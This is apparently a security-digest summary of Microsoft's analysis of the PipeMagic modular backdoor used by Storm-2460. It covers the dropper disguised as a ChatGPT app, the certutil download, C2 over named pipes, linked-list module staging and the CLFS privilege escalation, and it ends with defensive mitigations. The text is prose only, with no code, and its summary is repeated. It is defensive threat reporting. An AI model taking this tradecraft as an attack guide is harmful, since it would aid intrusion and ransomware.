Dissecting PipeMagic: Inside the Architecture of a Modular Backdoor Framework
Summary:
Microsoft Threat Intelligence released an in-depth report yesterday on the highly modular backdoor framework, PipeMagic, which they have observed being employed by Storm-2460 in multiple instances. Microsoft observed PipeMagic during their research into an attack chain that leverages CVE-2025-29824, an elevation of privilege vulnerability in Windows Common Log File System (CLFS), which was published as a blog in early April 2025. Microsoft has observed Storm-2460 targeting multiple sectors globally, including IT, financial, and real estate sectors in the US, Europe, South America, and the Middle East.PipeMagic is utilized as part of the pre-exploitation activity in attack chains also involving CVE-2025-29824. The PipeMagic infection starts with a malicious in-memory dropper disguised as the legitimate open-source ChatGPT Desktop Application. Storm-2460 used the certutil utility to download a file from a previously-compromised website acting as a host for the threat actor’s malware. This file payload is a malicious MSBuild file that ultimately drops PipeMagic in memory. After running PipeMagic, Storm-2460 performs the CLFS exploit for privilege escalation and launches its ransomware. PipeMagic uses a named pipe to communicate with its C2 server over TCP to retrieve payload modules. The malware can self-update by storing new modules in memory using a series of doubly linked lists. The lists allow the threat actor to manage the backdoor's capabilities lifecycle by staging, executing, and communicating with its various payload modules.
This dissection of PipeMagic malware offers valuable insights into the inner workings of the PipeMagic framework and the TTPs of Storm-2460. The unique incorporation of linked list data structures to manage the myriad of capabilities that the backdoor has to offer further reinforces the resourceful nature of Storm-2460. When the backdoor receives a C2 server response, it parses the data and matches it to an extensive list of processing codes that correspond to functionality unique to the different linked lists in order to determine the backdoor’s response. The PipeMagic backdoor invokes the network module’s communication function to transmit system information to the C2 over the established TCP socket. PipeMagic actors likely gather this amalgamation of system info to use as the infected host’s unique identifier. Microsoft’s recent findings indicate that the now-patched CLFS vulnerability, CVE-2025-29824, is still being actively exploited on vulnerable systems. Kaspersky released a blog post on PipeMagic concurrently with the Microsoft Threat Intelligence blog post.
Suggested Corrections:
IOCs are available here.
Microsoft recommends the following mitigations to reduce the impact of activity associated with PipeMagic and Storm-2460:
https://www.microsoft.com/en-us/security/blog/2025/08/18/dissecting-pipemagic-inside-the-architecture-of-a-modular-backdoor-framework/
Microsoft Threat Intelligence released an in-depth report yesterday on the highly modular backdoor framework, PipeMagic, which they have observed being employed by Storm-2460 in multiple instances. Microsoft observed PipeMagic during their research into an attack chain that leverages CVE-2025-29824, an elevation of privilege vulnerability in Windows Common Log File System (CLFS), which was published as a blog in early April 2025. Microsoft has observed Storm-2460 targeting multiple sectors globally, including IT, financial, and real estate sectors in the US, Europe, South America, and the Middle East.PipeMagic is utilized as part of the pre-exploitation activity in attack chains also involving CVE-2025-29824. The PipeMagic infection starts with a malicious in-memory dropper disguised as the legitimate open-source ChatGPT Desktop Application. Storm-2460 used the certutil utility to download a file from a previously-compromised website acting as a host for the threat actor’s malware. This file payload is a malicious MSBuild file that ultimately drops PipeMagic in memory. After running PipeMagic, Storm-2460 performs the CLFS exploit for privilege escalation and launches its ransomware. PipeMagic uses a named pipe to communicate with its C2 server over TCP to retrieve payload modules. The malware can self-update by storing new modules in memory using a series of doubly linked lists. The lists allow the threat actor to manage the backdoor's capabilities lifecycle by staging, executing, and communicating with its various payload modules.
- Payload linked list: Stores raw payload modules in each node, representing the initial stage of modular deployment.
- Execute linked list: Contains payload modules that have been successfully loaded into memory and are ready for execution.
- Network linked list: Contains networking modules responsible for C2 communication.
- Unknown linked list: Based on Microsoft’s behavioral analysis, they hypothesize it is leveraged dynamically by loaded payloads rather than the core backdoor logic itself.
This dissection of PipeMagic malware offers valuable insights into the inner workings of the PipeMagic framework and the TTPs of Storm-2460. The unique incorporation of linked list data structures to manage the myriad of capabilities that the backdoor has to offer further reinforces the resourceful nature of Storm-2460. When the backdoor receives a C2 server response, it parses the data and matches it to an extensive list of processing codes that correspond to functionality unique to the different linked lists in order to determine the backdoor’s response. The PipeMagic backdoor invokes the network module’s communication function to transmit system information to the C2 over the established TCP socket. PipeMagic actors likely gather this amalgamation of system info to use as the infected host’s unique identifier. Microsoft’s recent findings indicate that the now-patched CLFS vulnerability, CVE-2025-29824, is still being actively exploited on vulnerable systems. Kaspersky released a blog post on PipeMagic concurrently with the Microsoft Threat Intelligence blog post.
Suggested Corrections:
IOCs are available here.
Microsoft recommends the following mitigations to reduce the impact of activity associated with PipeMagic and Storm-2460:
- Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
- Enable network protection in Microsoft Defender for Endpoint.
- Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
https://www.microsoft.com/en-us/security/blog/2025/08/18/dissecting-pipemagic-inside-the-architecture-of-a-modular-backdoor-framework/